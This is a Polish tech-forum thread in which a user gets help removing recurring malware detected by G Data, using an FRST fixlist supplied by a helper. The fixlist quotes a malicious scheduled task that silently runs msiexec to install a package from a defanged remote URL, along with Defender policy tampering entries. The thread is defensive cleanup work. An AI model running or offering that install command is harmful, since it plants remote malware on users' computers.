Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

G Data niechciany program uruchamiany przez cmd.exe

KamilPL95 21 Lis 2018 17:32 138 6
  • #1 21 Lis 2018 17:32
    KamilPL95
    Poziom 2  

    Witam. Od jakiegoś czasu mam problem a mianowicie G Data wykrywa jakiś niechciany program który jest uruchamiany przez cmd.exe. Za każdym razem przenoszę to do kwarantanny i potem robi się reset win żeby oczyścić komputer nic w tym złego gdyby nie to ze w przeciągu 2-3h korzystania z komputera pokazuje mi się to 3, 4 razy i to codziennie tak jest. Nie pomaga usuniecie tego "niechcianego programu" bo za każdym razem jak to robię to i tak to wraca tylko pod inną nazwą aktualnie "mse.engine.dll". G Data jest chyba bezradny wykonałem skan malwarebytes ten nic nie wykrywa wykonałem skan za pomocą "kaspersky rescue disk 2018" ten tez nic nie wykrywa nie mam pojęcia o co chodzi. Co robić? Jak to naprawić?

    0 6
  • #4 21 Lis 2018 19:33
    Kolobos
    Spec od komputerów

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {5EDF94C7-FB31-40D7-A5FE-92C10DC8D6BE} - \Microsoft\Windows\Setup\EOSNotify -> Brak pliku <==== UWAGA
    Task: {746BA3A0-54FA-4C01-8AB7-BA4B52E9F17C} - System32\Tasks\{B16D501B-46FA-0895-8A93-55CC89C3224F} => "msiexec" -q -i hxxps://faremler.com/wqiwhmrlkara.ktq
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\explorer.exe [3932672 2018-07-06] (Microsoft Corporation) <==== UWAGA
    HKU\S-1-5-20\...\Winlogon: [Shell] C:\Windows\explorer.exe [3932672 2018-07-06] (Microsoft Corporation) <==== UWAGA
    HKU\S-1-5-21-4111267538-3704650234-1057555034-1000\...\MountPoints2: {934168ca-e1ca-11e8-b363-806e6f6e6963} - "E:\pcformat.exe"
    HKU\S-1-5-21-4111267538-3704650234-1057555034-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [3932672 2018-07-06] (Microsoft Corporation) <==== UWAGA
    HKU\S-1-5-21-4111267538-3704650234-1057555034-1003\...\Winlogon: [Shell] C:\Windows\explorer.exe [3932672 2018-07-06] (Microsoft Corporation) <==== UWAGA
    HKU\S-1-5-18\...\Winlogon: [Shell] C:\Windows\explorer.exe [3932672 2018-07-06] (Microsoft Corporation) <==== UWAGA
    GroupPolicy: Ograniczenia ? <==== UWAGA
    S3 NTIOLib_1_0_C; \??\C:\MSI\MSI SUITE\NTIOLib_X64.sys [X]
    2018-11-06 22:50 - 2018-11-20 19:26 - 000000000 ____D C:\AdwCleaner
    2018-11-18 21:21 - 2018-11-19 19:49 - 000000277 _____ () C:\Users\Halyna i Marian\IP_Log_Data.js
    2018-04-12 00:34 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\YYUyeYD.exe

    W FRST wybierz Napraw.

    0
  • #5 21 Lis 2018 19:41
    KamilPL95
    Poziom 2  

    Zrobiłem tak teraz co?

    0
  • #6 21 Lis 2018 20:03
    Kolobos
    Spec od komputerów

    Czy antywirus nadal cos wykrywa?

    0
  • #7 22 Lis 2018 21:07
    KamilPL95
    Poziom 2  

    Pomogło :) wielkie dzięki!

    0